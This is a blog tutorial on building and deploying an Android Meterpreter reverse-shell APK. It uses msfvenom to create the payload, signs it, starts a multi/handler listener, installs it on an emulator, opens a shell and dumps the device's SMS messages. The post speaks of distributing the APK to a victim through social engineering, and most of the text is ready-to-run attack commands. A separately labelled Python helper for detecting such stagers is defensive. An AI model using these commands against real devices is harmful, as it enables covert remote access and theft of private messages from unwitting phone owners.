Lucifer

Android Exploitation

In previous posts, we saw how Android devices can be used for penetration testing. Let’s reverse the sides and use our Android device as the target. In this post, we will learn how to create an APK file using the tools offered by Metasploit Framework. We will focus on Metasploit's Android-based payloads and use msfvenom to create the APK file.


Step 1: Creating APK


Enter the following command to generate the APK file that will be distributed to the victim:


msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.2 LPORT=4444 R > SignApk/evilAndroid.apk


We use 10.0.2.2 as LHOST because that is the address through which the emulated device reaches the host computer.


It will take 2-3 minutes for the file to be created.


Step 2: Changing Directories


Once our APK is created, we need to sign it. This is an essential step because most Android devices won't install unsigned applications. Signing an APK is normally a multi-step process; here we simplify it by using a pre-generated certificate and key together with the signapk.jar utility. We saved all of them in the same directory as our APK. Change to that directory as follows:

cd SignApk


Step 3: Signing APK


Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.

java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk


To make sure that the file was created, list the working directory:

ls


Step 4: Starting Metasploit Listener


Now let's start the Metasploit listener. We've done the step-by-step setup in other labs, so this time we will do it all at once with a one-liner:

msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"


The -q option ("quiet") suppresses the banner and version information. Note that LHOST is now the actual localhost IP, 127.0.0.1, not the address the emulated device uses to reach the host.

Now open a new console tab with Ctrl + Shift + T.


Step 5: Starting Android Emulator


Enter the following command to start the Android emulator instance that we will use as our target:

android-sdk-linux/tools/emulator @android17 -no-window


It may take several minutes for the emulator instance to start. Be patient.


Step 6: Migrating Consoles


Next, we need to get our malicious APK onto the device. In a real-life scenario this would require social engineering to trick the device owner into downloading and installing the APK. Let's assume that happened, and play the victim ourselves.

Open up a new tab, "Tab 3".


Step 7: Installing APK


To install the APK, enter the command below. Make sure to use the signed version of the APK, evilAndroidc.apk, not the original evilAndroid.apk:

adb install SignApk/evilAndroidc.apk


You will get a "device offline" error at first, because it takes some time for the emulated device to connect to the ADB server. If you are returned to the prompt, try again. Keep re-entering the command until you see the "Success" message (it may take several attempts).

Step 8: Launching App


Next, we need to launch the application. Opening apps from the command line is a bit tricky: you need to know the package name and the Activity name. We looked them up for you, so just enter the following command to run the app:


adb shell am start com.metasploit.stage/.MainActivity
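The two facts a defender can pull out of Steps 2, 3 and 8 above are that the generated APK only installs once it carries a signature, and that the launched component is com.metasploit.stage/.MainActivity. The following triage helper is an added example, not part of the original post: it inspects an APK as the zip container it is, reports whether v1 (JAR) signature files are present, and flags dex files that reference the com.metasploit.stage class path. The sample APK it builds is constructed inline for the demonstration.

```python
import io
import re
import zipfile

# Indicators taken from the walkthrough: the stager's class path prefix as it
# appears in the dex string table, and the JAR-signature entries under META-INF.
STAGE_CLASS = b"Lcom/metasploit/stage/"
SIGNATURE_RE = re.compile(r"^META-INF/.+\.(RSA|DSA|EC)$")


def triage_apk(apk_bytes):
    """Return signing state and Metasploit stager markers for one APK.

    Only the zip container is examined (no manifest decoding), so this runs
    without the Android SDK. Caveat: APK Signature Scheme v2/v3 lives in a
    signing block outside the central directory and is not detected here;
    an APK can be validly signed while 'signed' reports False.
    """
    result = {"signed": False, "metasploit_stage": False, "dex_files": 0}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if SIGNATURE_RE.match(info.filename):
                result["signed"] = True
            if info.filename.endswith(".dex"):
                result["dex_files"] += 1
                # Class descriptors are stored as plain bytes in classes.dex.
                if STAGE_CLASS in zf.read(info):
                    result["metasploit_stage"] = True
    return result


def build_sample_apk(signed, stage):
    """Constructed sample: a minimal zip mimicking the APK entries we inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<placeholder/>")
        activity = b"Lcom/metasploit/stage/MainActivity;" if stage \
            else b"Lcom/example/app/MainActivity;"
        zf.writestr("classes.dex", b"dex\n035\x00" + activity)
        if signed:
            zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"\x30\x82")  # truncated DER stub
    return buf.getvalue()


if __name__ == "__main__":
    for signed, stage in ((False, True), (True, True), (True, False)):
        print(f"signed={signed} stage={stage} ->",
              triage_apk(build_sample_apk(signed, stage)))
```

To run it against a real file, pass `open("app.apk", "rb").read()` to `triage_apk`; a hit on `metasploit_stage` is a strong indicator that the APK is an msfvenom stager regardless of whether it has been re-signed.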


Step 9: Getting a Shell


Now go back to the Metasploit listener running in "Console Tab 1".


We got a Meterpreter shell!


Step 10: Using Meterpreter on Android


Android Meterpreter is similar to the Linux version we used in other labs, but it also has some unique options. Enter help to see the available commands.

help


Step 11: Getting System Information


Enter sysinfo to get information about the target system:

sysinfo


Step 12: Migrating Consoles


One of the most useful Android Meterpreter commands is dump_sms, which does just what its name says: it dumps all SMS messages from the device into a text file.

Migrate to "Console tab 3" to send an SMS message to our device.

Step 13: Sending SMS


We can use Telnet to send SMS messages to emulated devices. First, open a Telnet session as follows:

telnet localhost 5554


Next, enter sms send followed by a phone number and message. You can use any values for these, just don't include any dashes in the phone number and make sure that your message is in quotes, for example:

sms send 1112223333 "Hey there"


Now switch back to console tab 1.


Step 14: Dumping SMS


Enter the dump_sms command:

dump_sms


Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.


Step 15: Reading SMS Dump


Enter the following command to read the SMS file (enter the file name with your timestamp):

cat sms_dump_<timestamp>.txt


We can see the contents of the messages as well as the associated metadata.


Also read: Hacking with Android


That's it for this post. We hope you liked it; please share it with your friends. More amazing stuff is waiting for you: check out the shop at Payground or visit HERE.


©2020 by Payground. Proudly created with Wix.com